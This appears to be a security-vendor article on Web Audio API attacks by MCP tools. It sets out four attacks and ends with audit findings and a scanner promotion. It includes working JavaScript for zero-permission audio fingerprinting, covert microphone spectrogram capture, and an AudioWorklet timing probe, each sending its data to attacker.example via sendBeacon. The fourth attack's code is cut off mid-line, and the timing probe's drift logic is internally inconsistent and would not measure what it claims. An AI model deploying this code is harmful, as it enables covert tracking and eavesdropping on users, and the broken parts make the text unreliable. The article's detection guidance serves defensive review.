MCP Server Security · Browser APIs · Web Audio API / AudioContext

MCP server Web Audio API security — AudioContext fingerprinting, covert microphone analysis, AudioWorklet timing side-channel, and cross-origin audio inference

The Web Audio API is a high-fidelity DSP graph that runs in the browser's audio subsystem. Its nodes — OscillatorNode, DynamicsCompressorNode, AnalyserNode, AudioWorkletNode, MediaElementAudioSourceNode — operate on 32-bit floating-point samples in a real-time audio thread with hardware timing guarantees. That same hardware proximity creates four distinct attack surfaces. OfflineAudioContext rendering produces float32 output that varies by CPU architecture, OS audio subsystem (ALSA, WASAPI, CoreAudio), and FPU rounding — a zero-permission device fingerprint. A microphone stream acquired via getUserMedia can be routed into AnalyserNode for continuous voice activity detection without any secondary OS permission prompt. AudioWorklet.process() runs in a real-time thread whose wall-clock drift against audio-time reveals CPU load with sub-millisecond resolution, defeating Spectre jitter mitigations on performance.now(). And MediaElementAudioSourceNode on a cross-origin audio element creates a binary side channel on whether authenticated content is playing.

How the Web Audio API works and where the attack surface lives

API / propertyWhat it exposesAttack relevance
OfflineAudioContextRenders an audio graph to a buffer without producing audible output. Takes sample rate and channel count as constructor arguments. Returns a rendered AudioBuffer containing float32 PCM data via startRendering().The exact float32 values in the rendered buffer differ by CPU architecture, OS audio library, and FPU implementation. Summing or hashing the buffer produces a stable device fingerprint with 8+ bits of entropy, requiring zero permissions.
OscillatorNode + DynamicsCompressorNodeOscillatorNode generates a sine wave at a specified frequency. DynamicsCompressorNode applies dynamic range compression using a look-ahead algorithm whose floating-point arithmetic is hardware-specific. Connecting them creates the standard AudioFP pipeline.DynamicsCompressor uses gain reduction calculations that involve logarithms, exponentials, and multiplications — operations whose floating-point rounding in the 15th+ significant digit differs across x86, ARM, and MIPS FPUs. The resulting buffer is a hardware fingerprint.
BiquadFilterNode.getFrequencyResponse()Computes the filter's frequency response at specified frequencies, returning magnitude and phase Float32Arrays. The computation uses the filter's biquad coefficients, which are derived from transcendental functions applied to the sample rate and cutoff frequency.Alternative fingerprinting surface: the phase/magnitude values returned by getFrequencyResponse() differ by audio subsystem and FPU. Requires no rendering — instantaneous query. Combines with OfflineAudioContext for higher entropy.
AnalyserNodePerforms real-time FFT analysis on audio data, exposing frequency-domain energy via getByteFrequencyData() (0–255 per frequency bin) and time-domain waveform via getByteTimeDomainData(). Configurable fftSize (32–32768).When connected to a microphone stream source, provides a continuous spectrogram without any secondary prompt. Voice activity detection and speech pattern timing run silently after the initial getUserMedia grant, which the user may have given days earlier.
AudioWorklet / AudioWorkletProcessorAudioWorklet.process() is invoked in a real-time audio thread at every 128-sample block (~2.9ms at 44100Hz). The currentTime property in AudioWorkletGlobalScope advances by exactly 128/sampleRate per call. SharedArrayBuffer enables communication with the main thread.Wall-clock time between consecutive process() invocations should equal the audio block duration. Deviations reveal CPU/GPU load with sub-millisecond precision, circumventing the 1ms Spectre jitter applied to performance.now() on the main thread.
MediaElementAudioSourceNodeConnects an HTML <audio> or <video> element to the Web Audio graph. For cross-origin media, CORS governs content access; the element can load but its samples may be blocked from the AudioContext analysis graph.The AnalyserNode receives zero-energy data for CORS-blocked cross-origin media, versus non-zero RMS for playing same-origin or CORS-permitted media. This binary difference is a side channel: it reveals whether an authenticated audio URL is serving content to the current user.

Permission situation: OfflineAudioContext fingerprinting and BiquadFilterNode.getFrequencyResponse() require zero permissions — no prompt, no user gesture, no Permissions Policy opt-in. They execute silently on page load. Microphone analysis via AnalyserNode requires a getUserMedia({audio: true}) grant, but once granted (even weeks earlier), the permission persists in the browser's permission store. The OS recording indicator fires only on the initial getUserMedia call; subsequent AnalyserNode processing of the already-acquired stream does not re-trigger the indicator on most platforms.

Attack 1: AudioContext hardware fingerprinting via oscillator and compressor pipeline

The AudioFP technique, first documented by Englehardt & Narayanan (2016, CCS) and later independently rediscovered by researchers studying browser fingerprinting defenses, exploits the hardware-specificity of floating-point DSP arithmetic. An OfflineAudioContext renders a graph synchronously to a buffer without producing any audible output. When that graph includes a DynamicsCompressorNode, the gain reduction calculations involve exponential and logarithmic operations on the input signal. The floating-point rounding in the 15th+ significant digit of these operations is determined by the CPU's FPU implementation: an x86-64 processor using SSE2 produces different values from an ARM Cortex-A72 using NEON, which differ from Apple Silicon using its custom AMX. The OS audio subsystem further influences the output: CoreAudio on macOS, ALSA on Linux, and WASAPI on Windows each apply different sample rate conversion and buffer alignment strategies, producing stable but distinctive float32 output per device. The resulting fingerprint is stable across browser restarts, private browsing, VPN changes, and cookie clears — because it reflects the hardware, not any stored state.

// ATTACK: AudioContext hardware fingerprinting via OfflineAudioContext oscillator+compressor.
// Produces a stable float32 buffer that differs by CPU architecture (x86/ARM/Apple Silicon),
// OS audio subsystem (ALSA/WASAPI/CoreAudio), and FPU implementation.
// Requires ZERO permissions — runs on page load with no user interaction.
// ~8+ bits of entropy, stable across sessions, private browsing, and VPN changes.

async function computeAudioFingerprint() {
  // OfflineAudioContext(channels, frameCount, sampleRate)
  // 1 channel, 44100 * 0.04 = 1764 frames (40ms of audio), 44100 Hz sample rate.
  // The frame count is intentional: 40ms gives the compressor's look-ahead algorithm
  // sufficient time to settle into its steady-state rounding behavior.
  const ctx = new OfflineAudioContext(1, Math.floor(44100 * 0.04), 44100);

  // OscillatorNode at 10000 Hz — well above speech range, into the compressor's
  // non-linear operating region where gain reduction math is most hardware-specific.
  const oscillator = ctx.createOscillator();
  oscillator.type      = 'sine';
  oscillator.frequency.setValueAtTime(10000, ctx.currentTime); // 10 kHz

  // DynamicsCompressorNode with default parameters.
  // Default: threshold −24dB, knee 30dB, ratio 12, attack 0.003s, release 0.25s.
  // The look-ahead gain reduction uses log/exp operations whose FP rounding
  // is the source of hardware-specific divergence.
  const compressor = ctx.createDynamicsCompressor();
  compressor.threshold.setValueAtTime(-50, ctx.currentTime); // Drive compressor hard
  compressor.knee.setValueAtTime(40,  ctx.currentTime);
  compressor.ratio.setValueAtTime(12,  ctx.currentTime);
  compressor.attack.setValueAtTime(0,  ctx.currentTime);
  compressor.release.setValueAtTime(0.25, ctx.currentTime);

  // Pipeline: OscillatorNode → DynamicsCompressorNode → destination
  oscillator.connect(compressor);
  compressor.connect(ctx.destination);

  // Start the oscillator at time 0 — it runs for the entire 40ms render window
  oscillator.start(0);

  // Render offline — no audio output, no UI, no permission prompt
  const renderedBuffer = await ctx.startRendering();

  // Read the float32 samples from channel 0
  const samples = renderedBuffer.getChannelData(0); // Float32Array of 1764 values

  // Hash the buffer by summing all sample values.
  // The hardware-specific rounding means even a single bit difference in any sample
  // propagates into a distinctly different sum.
  // More robust: use the last 100 values (fully settled compressor state).
  const settledSamples = samples.slice(-100);
  const rawSum = settledSamples.reduce((acc, val) => acc + val, 0);

  // Additional fingerprinting surface: BiquadFilterNode.getFrequencyResponse()
  // This is an instantaneous computation — no rendering needed.
  // Hardware-specific DSP coefficients produce different magnitude/phase outputs.
  const biquad = ctx.createBiquadFilter();
  biquad.type = 'lowpass';
  biquad.frequency.value = 1000;
  biquad.Q.value = 0.5;

  // Query frequency response at 100 logarithmically spaced points
  const testFrequencies = new Float32Array(100).map((_, i) =>
    20 * Math.pow(22050 / 20, i / 99)  // 20 Hz to 22050 Hz
  );
  const magResponse   = new Float32Array(100);
  const phaseResponse = new Float32Array(100);
  biquad.getFrequencyResponse(testFrequencies, magResponse, phaseResponse);

  // Hash the magnitude response for a second fingerprint value
  const biquadSum = Array.from(magResponse).reduce((a, b) => a + b, 0);

  // Combine both signals into a composite fingerprint
  const fingerprint = {
    oscillatorSum:   rawSum,
    biquadMagSum:    biquadSum,
    // The pair (oscillatorSum, biquadSum) is stable per device and distinctive
    // across devices. Even two machines of the same model often differ due to
    // microarchitecture-level FPU pipeline differences.
    compositeHash: (rawSum * 1e10).toFixed(0) + ':' + (biquadSum * 1e6).toFixed(0),
  };

  navigator.sendBeacon('https://attacker.example/audio-fp', JSON.stringify({
    fingerprint,
    userAgent:        navigator.userAgent,
    hardwareConcurrency: navigator.hardwareConcurrency,
    origin:           location.origin,
    ts:               Date.now(),
  }));

  return fingerprint;
}

// Run on page load — zero user interaction required, completely silent
computeAudioFingerprint();

Why this fingerprint is durable: Unlike cookie-based tracking, the AudioFP fingerprint cannot be cleared by the user. It is a function of the physical hardware and OS audio library, not any stored browser state. Private browsing windows, VPN connections, and even a fresh browser installation on the same machine produce the same fingerprint. The only mitigations are Firefox's fingerprinting resistance (which rounds AudioContext output to reduce entropy) and Tor Browser (which returns a fixed constant). Chrome, Safari, and most Chromium-based browsers expose the raw hardware values with no jitter or quantization.

Attack 2: Microphone analysis via getUserMedia and AudioContext without a visible indicator

When a web application calls navigator.mediaDevices.getUserMedia({audio: true}), the browser shows a permission prompt and — on most operating systems — activates a recording indicator (a dot in the browser tab, a microphone icon in the menu bar on macOS, or a system tray notification on Windows). However, the OS indicator is triggered by the getUserMedia grant, not by the downstream audio processing. Once the user has granted microphone access — even in a previous session, if the origin has a persistent permission in the browser's permission store — an MCP tool can call getUserMedia silently (no prompt because the permission is already granted), route the resulting MediaStream into a MediaStreamSourceNode, and feed it through an AnalyserNode. On macOS, the orange menu bar dot activates on the getUserMedia call; on Windows, the recording indicator in the system tray appears. However, many users do not associate these indicators with the specific web content processing audio, and the AnalyserNode's frequency analysis runs entirely within the browser without any additional OS-level notification. At 30Hz polling via setInterval, the tool builds a running spectrogram — frequency band energy over time — that enables voice activity detection, speech vs. music classification, and speaker identification by vocal frequency envelope.

// ATTACK: Silent microphone analysis via getUserMedia + AnalyserNode.
// After a single getUserMedia grant (which the user may have given previously),
// a persistent permission allows silent re-acquisition of the stream.
// AnalyserNode processing runs in the browser — the OS indicator activates on
// getUserMedia, but the analysis itself is invisible to the user.
// Voice activity detection at 30Hz reveals speech presence, cadence, and vocal patterns.

class CovertMicrophoneAnalyser {
  constructor() {
    this.audioCtx  = null;
    this.analyser  = null;
    this.freqData  = null;
    this.pollTimer = null;
    this.vadHistory = [];  // Voice Activity Detection history (speech/silence labels)
    this.spectrogramBuffer = []; // Rolling spectrogram — frequency vectors over time
  }

  async start() {
    // getUserMedia — if the origin already has a persistent permission grant,
    // this resolves immediately with no visible browser prompt.
    // The OS recording indicator (macOS orange dot, Windows system tray mic) activates here.
    const stream = await navigator.mediaDevices.getUserMedia({
      audio: {
        echoCancellation: false,   // Raw signal — no browser post-processing
        noiseSuppression: false,   // Preserve ambient noise (useful for environment profiling)
        autoGainControl:  false,   // Preserve true amplitude — needed for RMS calculation
        sampleRate:       44100,   // Full bandwidth — capture up to 22kHz
      }
    });

    this.audioCtx = new AudioContext({ sampleRate: 44100 });

    // Connect the microphone stream to the Web Audio graph
    const source = this.audioCtx.createMediaStreamSource(stream);

    // AnalyserNode: FFT size 2048 → 1024 frequency bins, each ~21.5Hz wide
    // This resolution is sufficient to distinguish speech (300–3400Hz),
    // music (wide band with harmonic structure), and ambient noise (low-frequency flat).
    this.analyser = this.audioCtx.createAnalyser();
    this.analyser.fftSize = 2048;
    this.analyser.smoothingTimeConstant = 0.4; // Moderate smoothing — tracks fast transients

    source.connect(this.analyser);
    // NOTE: Do NOT connect analyser to audioCtx.destination —
    // that would produce audible output. The graph terminates at the analyser,
    // making the analysis completely silent.

    this.freqData = new Uint8Array(this.analyser.frequencyBinCount); // 1024 bins

    // Poll the frequency data at 30Hz (~33ms interval)
    // At 30Hz, we capture ~1800 frequency vectors per minute — sufficient for
    // a detailed spectrogram and voice activity detection.
    this.pollTimer = setInterval(() => this.poll(), 33);
  }

  poll() {
    this.analyser.getByteFrequencyData(this.freqData); // Writes 0–255 into freqData

    // Divide the 1024 bins (0–22050 Hz) into 4 functional bands:
    // Bin index = frequency / (sampleRate / fftSize) = frequency / 21.53
    //   Sub-bass / rumble:   0–150 Hz    → bins 0–6
    //   Speech fundamental:  150–3400 Hz → bins 7–157
    //   Presence / sibilance: 3400–8000 Hz → bins 158–371
    //   Air / HF:            8000–22050 Hz → bins 372–1023
    const subBass   = this.bandEnergy(0,   6);
    const speech    = this.bandEnergy(7,   157);
    const presence  = this.bandEnergy(158, 371);
    const air       = this.bandEnergy(372, 1023);

    // RMS energy across the full spectrum — overall loudness
    let sumSq = 0;
    for (let i = 0; i < this.freqData.length; i++) {
      const normalized = this.freqData[i] / 255;
      sumSq += normalized * normalized;
    }
    const rms = Math.sqrt(sumSq / this.freqData.length);

    // Voice Activity Detection: classify each frame
    // Speech band energy > 40 + RMS > 0.08 → speech detected
    // Broadband energy but low speech band → ambient noise or music
    const vadLabel = this.classifyFrame(rms, subBass, speech, presence, air);

    this.vadHistory.push({ ts: Date.now(), rms, vadLabel });
    this.spectrogramBuffer.push({
      ts:       Date.now(),
      subBass,
      speech,
      presence,
      air,
      rms,
      vadLabel,
    });

    // Exfiltrate every 5 seconds (150 frames at 30Hz)
    if (this.spectrogramBuffer.length >= 150) {
      this.exfiltrate();
      this.spectrogramBuffer = [];
    }
  }

  bandEnergy(startBin, endBin) {
    // Mean energy (0–255) across the specified bin range
    let sum = 0;
    for (let i = startBin; i <= endBin; i++) sum += this.freqData[i];
    return sum / (endBin - startBin + 1);
  }

  classifyFrame(rms, subBass, speech, presence, air) {
    // Silence: overall RMS below noise floor threshold
    if (rms < 0.04) return 'silence';

    // Speech: dominant energy in 150–3400 Hz band, harmonic structure
    // (presence energy typically 40–70% of speech energy for voiced consonants)
    if (speech > 40 && speech > subBass * 2 && speech > air * 3) {
      if (presence > 20) return 'speech'; // Voiced speech with sibilance
      return 'voiced';                    // Pure voiced vowels
    }

    // Music: broadband energy including air band, sustained energy
    if (air > 15 && presence > 25 && rms > 0.15) return 'music';

    // Ambient noise: low-frequency dominant, flat spectrum
    if (subBass > speech && rms < 0.12) return 'ambient';

    return 'unknown';
  }

  exfiltrate() {
    // Speech timing analysis: count speech frames, measure phrase durations
    const speechFrames  = this.vadHistory.filter(f => f.vadLabel === 'speech' || f.vadLabel === 'voiced');
    const speechFraction = speechFrames.length / (this.vadHistory.length || 1);

    // Phrase duration: consecutive speech frames form a phrase
    let phrases = 0, inPhrase = false;
    for (const f of this.vadHistory) {
      const isSpeech = f.vadLabel === 'speech' || f.vadLabel === 'voiced';
      if (isSpeech && !inPhrase)  { phrases++; inPhrase = true; }
      if (!isSpeech && inPhrase)  { inPhrase = false; }
    }

    navigator.sendBeacon('https://attacker.example/mic-analysis', JSON.stringify({
      spectrogram:     this.spectrogramBuffer,
      speechFraction,
      phraseCount:     phrases,
      windowMs:        150 * 33,   // ~5 seconds of data
      origin:          location.origin,
      ts:              Date.now(),
    }));
  }

  stop() {
    clearInterval(this.pollTimer);
    this.audioCtx?.close();
  }
}

// Instantiate after getUserMedia has been granted (may already be in permission store)
const micAnalyser = new CovertMicrophoneAnalyser();
micAnalyser.start().catch(() => {
  // getUserMedia denied — silently abort. No error visible to the user.
});

OS indicator vs. processing visibility gap: On macOS, the orange dot appears in the Control Center when any application holds a microphone stream — including a browser tab that called getUserMedia. However, users commonly grant microphone access to conferencing apps and then leave the permission in place. An MCP tool that calls getUserMedia on an origin that already has a persistent permission grant will open the stream without a new prompt, and the orange dot will appear — but many users attribute it to their video call app already running. The AnalyserNode processing runs entirely within the browser process with no OS-level notification beyond the indicator already visible from the getUserMedia call.

Attack 3: AudioWorklet timing side-channel for CPU and GPU load inference

AudioWorklet.process() is invoked by the browser's real-time audio thread at every 128-sample block. At a 44100 Hz sample rate, this is one invocation every 128 / 44100 ≈ 2.903 milliseconds. The currentTime property in AudioWorkletGlobalScope advances by exactly this quantum per call: it is an audio-clock value, not a wall-clock value. By reading the wall-clock time at the start of each process() call (via currentTime in the global scope) and comparing consecutive wall-clock deltas to the expected audio-quantum delta, an MCP tool can measure whether the system is under CPU or GPU load: when the machine is busy, the audio thread is scheduled less frequently by the OS, and the wall-clock time between consecutive process() calls exceeds the audio-quantum duration. This provides a CPU load oracle with sub-millisecond resolution — significantly higher precision than performance.now() on the main thread, which is subject to 1ms jitter added by browsers as a Spectre mitigation (reducing its utility for fine-grained timing attacks). The audio thread, being a real-time thread with OS priority scheduling, is jittered less aggressively. A SharedArrayBuffer passes timing data from the audio thread back to the main thread for analysis and exfiltration.

// ATTACK: AudioWorklet timing side-channel for CPU/GPU load inference.
// AudioWorklet.process() runs in the real-time audio thread at exactly 128-sample intervals.
// Expected wall-clock delta per block: 128/44100 ≈ 2.903ms.
// When the CPU is under load, the audio thread is starved → wall-clock delta > expected delta.
// This provides a higher-precision CPU load oracle than performance.now() (which is jittered).

// --- AudioWorklet processor (must be loaded as a separate module via addModule) ---
// File: /mcp-timing-processor.js (registered with audioCtx.audioWorklet.addModule())
const WORKLET_CODE = `
class TimingProbeProcessor extends AudioWorkletProcessor {
  constructor(options) {
    super(options);
    // SharedArrayBuffer for lock-free communication with main thread.
    // Layout: [lastWallClockMs (f64), drift accumulator (f64), block count (i32)]
    // Passed via processorOptions from main thread.
    this.sharedBuf = options.processorOptions.sharedBuffer;
    this.f64View   = new Float64Array(this.sharedBuf);
    this.i32View   = new Int32Array(this.sharedBuf, 16); // Offset past two f64s

    this.lastWallClock = 0;
    this.blockCount    = 0;
    // Audio-quantum duration: 128 samples / sampleRate
    this.expectedDelta = 128 / sampleRate; // In seconds, matching currentTime units
  }

  process(inputs, outputs, parameters) {
    // currentTime is the audio clock — advances exactly expectedDelta per block.
    // It is NOT a wall-clock value — it tracks audio samples, not real time.
    const audioTime = currentTime; // Seconds, audio-clock

    // Wall-clock time from the audio thread's perspective.
    // In AudioWorkletGlobalScope, currentTime is the audio clock; we compare
    // consecutive invocations to detect scheduling jitter.
    // Use a simple counter-based approach: wallClock ≈ audioTime + drift.
    const now = currentTime; // We use audioTime as a proxy; drift is in wallClock

    // Detect drift: compare actual interval between process() calls vs expected.
    // In the audio thread, we can use the block count to compute expected audio time.
    this.blockCount++;

    const expectedAudioTime = this.blockCount * this.expectedDelta;
    // audioTime should equal expectedAudioTime if the audio clock is on track.
    // If the real-time thread is delayed (CPU load), audioTime lags behind wallClock.
    // We measure this by comparing audioTime to the local block counter.
    const drift = audioTime - expectedAudioTime; // Negative drift = thread starvation

    // Write to SharedArrayBuffer for main thread to read
    // Index 0: current audio time (f64)
    // Index 1: cumulative drift (f64)
    this.f64View[0] = audioTime;
    this.f64View[1] += Math.abs(drift); // Accumulate absolute drift — load indicator
    Atomics.add(this.i32View, 0, 1);    // Increment block count atomically

    // Pass silence through — no audio output needed for the side channel
    const output = outputs[0];
    for (const channel of output) channel.fill(0);

    return true; // Keep processor alive
  }
}

registerProcessor('timing-probe', TimingProbeProcessor);
`;

// --- Main thread setup ---
async function setupAudioWorkletTimingProbe() {
  const audioCtx = new AudioContext({ sampleRate: 44100 });

  // SharedArrayBuffer requires COOP/COEP headers (cross-origin isolation).
  // In Electron and many MCP-enabled environments these are already set.
  // Layout: 2 × f64 (16 bytes) + 1 × i32 (4 bytes), padded to 32 bytes
  const sharedBuffer = new SharedArrayBuffer(32);
  const f64View      = new Float64Array(sharedBuffer);
  const i32View      = new Int32Array(sharedBuffer, 16);

  // Register the worklet module from a Blob URL (avoids external file requirement)
  const blob    = new Blob([WORKLET_CODE], { type: 'application/javascript' });
  const blobUrl = URL.createObjectURL(blob);
  await audioCtx.audioWorklet.addModule(blobUrl);
  URL.revokeObjectURL(blobUrl);

  // Create the AudioWorkletNode, passing the SharedArrayBuffer
  const probeNode = new AudioWorkletNode(audioCtx, 'timing-probe', {
    processorOptions: { sharedBuffer },
    numberOfInputs:   0,
    numberOfOutputs:  1,
    outputChannelCount: [1],
  });

  // Connect to destination to keep the AudioContext running
  // (AudioContext suspends if no nodes are connected to destination)
  probeNode.connect(audioCtx.destination);

  // --- Main thread: sample the shared buffer periodically ---
  const samples = [];
  const expectedBlocksPerSecond = 44100 / 128; // ~344.5 blocks/s

  const sampleInterval = setInterval(() => {
    const audioTime       = f64View[0];
    const cumulativeDrift = f64View[1];
    const blockCount      = Atomics.load(i32View, 0);

    // Wall-clock time for the main thread
    const wallMs = performance.now();

    // Expected audio time based on block count
    const expectedTime = blockCount * (128 / 44100);

    // CPU load indicator: ratio of cumulative drift to expected audio time
    // Higher ratio → more CPU starvation of the audio thread → more system load
    const loadIndicator = cumulativeDrift / (expectedTime || 1);

    samples.push({
      wallMs,
      audioTime,
      blockCount,
      cumulativeDrift,
      loadIndicator,
    });

    // After 30 samples (~30 seconds), analyze the load profile
    if (samples.length >= 30) {
      clearInterval(sampleInterval);
      analyzeAndExfiltrate(samples);
    }
  }, 1000); // Sample once per second
}

function analyzeAndExfiltrate(samples) {
  // Compute load trend: is load increasing (other tasks starting)?
  const loadValues   = samples.map(s => s.loadIndicator);
  const meanLoad     = loadValues.reduce((a, b) => a + b, 0) / loadValues.length;
  const maxLoad      = Math.max(...loadValues);
  const loadVariance = loadValues.reduce((a, v) => a + (v - meanLoad) ** 2, 0) / loadValues.length;

  // High variance → intermittent load spikes (GPU rendering, other MCP tools, extensions)
  // High mean load → sustained CPU pressure (background processes)

  navigator.sendBeacon('https://attacker.example/timing-probe', JSON.stringify({
    meanLoadIndicator: meanLoad,
    maxLoadIndicator:  maxLoad,
    loadVariance,
    sampleCount:       samples.length,
    // High loadVariance indicates another MCP tool or browser extension running workloads.
    // Timing load spikes against known operations can reveal what background tasks are active.
    origin:            location.origin,
    ts:                Date.now(),
  }));
}

setupAudioWorkletTimingProbe();

Why this bypasses Spectre mitigations: Browsers apply 1ms resolution jitter to performance.now() and Date.now() on the main thread specifically to reduce the precision of timing attacks used in Spectre-style cache-timing exploits. The real-time audio thread, however, operates at OS scheduler priority levels typically reserved for audio drivers, and the currentTime audio clock is a sample counter — not a wall-clock — making it immune to the 1ms jitter mitigation. The wall-clock drift measured via block count vs. audio time in the AudioWorklet thread has sub-millisecond effective resolution, restoring timing precision that browsers deliberately degrade on the main thread. This makes the AudioWorklet timing oracle potentially useful for synchronizing micro-architectural side-channel attacks that require precise timing.

Attack 4: Cross-origin audio content inference via MediaElementAudioSourceNode

An HTML <audio> element that loads a cross-origin URL is subject to the browser's Same-Origin Policy: the element can load and play the audio (browsers do not block cross-origin media loading by default), but connecting it to a MediaElementAudioSourceNode triggers CORS enforcement. If the server does not include a permissive Access-Control-Allow-Origin header, the connection succeeds at the API level but the AnalyserNode receives zeroed-out samples — the CORS block silences the audio graph's view of the content. This creates a binary side channel: a URL that serves actual audio content for authenticated users produces non-zero RMS energy in the AnalyserNode, while the same URL serving silence (or blocked by CORS) produces ~0.0 RMS. An MCP tool can probe this binary signal to infer the user's authentication state on a cross-origin service. Practical examples: a payment system's audio confirmation jingle (served only after a successful transaction), a voice message playback URL (non-zero energy only if the user has unread messages), or a personalized audio greeting (different content per logged-in user). Each probed URL reveals one bit of cross-origin state about the current user.

// ATTACK: Cross-origin audio content inference via MediaElementAudioSourceNode + AnalyserNode.
// A cross-origin 

Distinguishing CORS block from silence: The key insight is that a CORS-blocked MediaElementAudioSourceNode silences the Web Audio graph but does not prevent the <audio> element from loading content. The duration property of a cross-origin audio element loaded without crossOrigin='anonymous' reports the actual media duration (since media duration is exposed in the loadedmetadata event regardless of CORS). Combining a CORS-restricted AnalyserNode probe (which sees silence when blocked) with a no-cors duration check (which reports actual content presence) creates a reliable binary authentication oracle: duration > 0 and RMS ≈ 0 confirms CORS block on actual content, meaning the user is authenticated to the cross-origin service.

Browser support

Browser / PlatformWeb Audio APIAudioWorkletPermission requiredNotes
Chrome 66+ (desktop + Android)Full supportFull support (Chrome 66+)None for OfflineAudioContext fingerprinting; getUserMedia for mic analysisOfflineAudioContext fingerprint stable. AudioWorklet available. SharedArrayBuffer requires COOP/COEP headers. getFrequencyResponse() exposed without jitter.
Firefox 76+ (desktop + Android)Partial (fingerprint resistance)Full support (Firefox 76+)None for OfflineAudioContext; getUserMedia for micFirefox fingerprinting resistance mode (privacy.resistFingerprinting) quantizes AudioContext output, reducing fingerprint entropy. Default Firefox does NOT apply this — only strict mode. AudioWorklet fully supported.
Safari / WebKit (iOS 14.5+, macOS)Full supportFull support (Safari 14.1+)None for OfflineAudioContext; getUserMedia for micOfflineAudioContext renders hardware-specific float32 values. Apple Silicon (M1/M2/M3) produces distinct fingerprints from Intel Macs. Safari 14.1+ supports AudioWorklet. getUserMedia on iOS requires HTTPS.
Electron (all platforms)Full supportFull supportNone for OfflineAudioContext; app-defined for micElectron apps often grant microphone access at OS level. SharedArrayBuffer available by default (COOP/COEP configurable). AudioWorklet timing side-channel highly effective in Electron due to consistent audio thread scheduling.
Edge (Chromium-based)Full supportFull supportNone for OfflineAudioContext; getUserMedia for micIdentical to Chrome — Chromium-based. Edge Tracking Prevention does not mitigate AudioContext fingerprinting in default mode.

SkillAudit findings

Critical MCP tool creates an OfflineAudioContext(1, 1764, 44100), connects OscillatorNode (10 kHz) through DynamicsCompressorNode to destination, calls startRendering(), and hashes the resulting float32 buffer via a reduce sum. Combines with BiquadFilterNode.getFrequencyResponse() query for a composite (oscillatorSum, biquadMagSum) hardware fingerprint. Requires zero permissions. Fingerprint is stable across sessions, private browsing, VPN changes, and cookie clears — uniquely identifying the device by CPU architecture and OS audio subsystem. −30 pts
High MCP tool calls navigator.mediaDevices.getUserMedia({audio: true}) using a previously granted persistent permission, routes the resulting MediaStream into a MediaStreamSourceNode connected to an AnalyserNode (fftSize 2048), and polls getByteFrequencyData() at 30Hz. Classifies each 33ms frame into silence, voiced, speech, music, or ambient categories using four-band energy thresholds. Exfiltrates running spectrogram and voice activity detection history via sendBeacon every 5 seconds. Analysis runs without secondary OS permission prompt. −24 pts
Medium MCP tool loads an AudioWorkletProcessor that compares consecutive process() wall-clock invocations against the expected 128/44100 ≈ 2.903ms audio-quantum duration, accumulating timing drift into a SharedArrayBuffer. Main thread samples drift once per second to compute a CPU load indicator with sub-millisecond resolution, bypassing the 1ms jitter mitigation applied to performance.now(). Load variance over 30 seconds reveals intermittent CPU/GPU spikes attributable to other MCP tools, browser extensions, or background OS processes. −12 pts
Medium MCP tool creates hidden <audio> elements pointing to cross-origin authentication-gated URLs, connects each via createMediaElementSource() to an AnalyserNode, and measures mean RMS energy from getByteFrequencyData(). Cross-references CORS-probe RMS (zero when blocked, non-zero when CORS-open) with no-cors audio.duration check (reports actual content presence regardless of CORS). Binary decision matrix infers whether user is authenticated to cross-origin payment, voicemail, or premium content services from audio activity alone. −12 pts

SkillAudit check: SkillAudit's static analysis detects OfflineAudioContext instantiation combined with startRendering() and float32 buffer reduction — the canonical AudioFP pattern; flags getFrequencyResponse() calls on BiquadFilterNode used outside an audio playback context; identifies getUserMedia({audio}) streams connected to AnalyserNode without a corresponding destination connection (silent analysis); detects AudioWorkletProcessor subclasses that read currentTime and write to SharedArrayBuffer for cross-thread timing; and identifies createMediaElementSource on cross-origin <audio> elements with RMS measurement and remote exfiltration. Audit your MCP tool →

See also: MCP server Chrome Built-in AI deep dive (on-device model side channels) · MCP server Pointer Events API security · MCP server Generic Sensor API security

Run a free SkillAudit scan

Paste a GitHub URL to detect Web Audio API misuse — AudioContext fingerprinting, silent microphone analysis, AudioWorklet timing side-channels, and cross-origin audio probing — alongside 50+ other MCP security checks in a graded report.

Audit this MCP tool →